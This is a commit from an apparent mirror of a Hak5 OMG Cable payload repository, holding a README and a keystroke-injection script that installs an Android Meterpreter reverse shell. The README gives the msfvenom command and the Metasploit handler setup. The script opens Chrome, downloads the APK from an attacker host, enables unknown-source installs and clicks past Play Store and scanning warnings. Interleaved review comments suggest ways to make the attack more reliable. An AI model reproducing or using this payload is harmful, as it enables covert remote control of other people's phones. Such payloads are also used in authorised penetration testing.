mirror of https://github.com/hak5/omg-payloads.git
commit
54fef53fb3
@ -0,0 +1,39 @@
# Android Meterpreter

An OMG Cable payload which downloads and installs an APK onto an Android device. Here are the high-level notes.

I would like to see operating systems prompt for authentication when performing risky behaviors, such as installing a new app.

## Generate Payload

Regular `msfvenom` payload generation.

```D
$ msfvenom -p android/meterpreter_reverse_tcp LHOST=x.x.x.x LPORT=5555 -o /data/omg.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 79592 bytes
Saved as: /data/omg.apk
```

## Handler

These instructions can also be saved and loaded as an `rc` file via `msfconsole -r`.

```
$ msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload android/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set lport 5555
msf6 exploit(multi/handler) > set lhost eth0
msf6 exploit(multi/handler) > run
```

## Miscellaneous

Some apparent artifacts remain. This is an abbreviated list.

* Notification shows apk was downloaded
* APK remains installed as MainActivity
* `app_uninstall com.metasploit.stage` does not remove the apk
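Review bot: the README leaves out the target assumptions and the hosting step that the script in this commit depends on. The script header pins the target to Android 11 with Chrome as the browser and fetches the APK from an HTTPS URL, but none of that appears here, and the names do not line up: `msfvenom ... -o /data/omg.apk` writes `omg.apk`, while the script requests `https://x.x.x.x/your-app.apk`. Suggest a short Requirements line (Android 11, Chrome, the APK served over HTTPS) and a one-line hosting step between Generate Payload and Handler that copies the generated APK to the web root under the name the script will request. Two smaller points: the fence tag ```D marks the `msfvenom` transcript as D source, so drop the tag or use `console` as the Handler block does; and the Miscellaneous item `app_uninstall com.metasploit.stage` does not remove the apk is a cleanup caveat that should say how the operator is expected to remove the app instead, rather than leaving the reader to find out after the engagement.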
@ -0,0 +1,130 @@
REM # -----------------------------------------------------------
REM # Title: OMG Android Meterpreter
REM # Description: Download and install an APK on Android
REM # Author: int0x80
REM # Target: Android 11
REM # Notes: Set URL for APK payload below
REM # -----------------------------------------------------------


REM # -----------------------------------------------------------
REM # Launch browser to APK destination
REM # -----------------------------------------------------------

GUI b
DELAY 1000
CTRL l
DELAY 50
STRING https://x.x.x.x/your-app.apk
DELAY 50
ENTER
DELAY 2000


REM # -----------------------------------------------------------
REM # Move focus to 'Open' link
REM # -----------------------------------------------------------

TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
RIGHT
DELAY 50
ENTER
DELAY 500


REM # -----------------------------------------------------------
REM # Select Chrome as approved source to install apps
REM # -----------------------------------------------------------

ENTER
DELAY 50
TAB
DELAY 50
ENTER
DELAY 50


REM # -----------------------------------------------------------
REM # Finish approved source
REM # GUI DELETE might work here
REM # -----------------------------------------------------------

GUI TAB
DELAY 50
ENTER
DELAY 50


REM # -----------------------------------------------------------
REM # Scanning and Play Store warnings
REM # Install, Install Anyway, Don't send for scanning, Open
REM # -----------------------------------------------------------

RIGHT
DELAY 50
ENTER
DELAY 50
TAB
DELAY 50
ENTER
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
ENTER
DELAY 50
ENTER
DELAY 250


REM # -----------------------------------------------------------
REM # Accept access settings and Continue
REM # -----------------------------------------------------------

TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
ENTER
DELAY 250


REM # -----------------------------------------------------------
REM # Get shell and obligatory calc
REM # -----------------------------------------------------------

ENTER
DELAY 250
GUI a
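Review bot: the script is a blind keystroke sequence with no way to recover when a screen differs from the one it was recorded against, and the first step is the most fragile. `STRING https://x.x.x.x/your-app.apk` with a bare IP address will stop on Chrome's certificate interstitial instead of the download bar unless the host presents a certificate the device already trusts, and every later count (nine TABs to reach 'Open', the fixed TAB/ENTER runs through the approved-source setting, the scanning and Play Store prompts, and the ten TABs on the access settings screen) assumes that the previous dialog rendered as expected within a `DELAY 50`. Suggest stating the tested Chrome version next to `REM # Target: Android 11`, adding the TLS requirement to `REM # Notes:`, and raising the delays that follow a navigation or dialog open well above 50 ms; the 'Install Anyway' / 'Don't send for scanning' branch also only appears when scanning is enabled on the device, so that section should say so. `REM # GUI DELETE might work here` is an unresolved TODO; either test it and replace the `GUI TAB` / `ENTER` pair or drop the comment before merge.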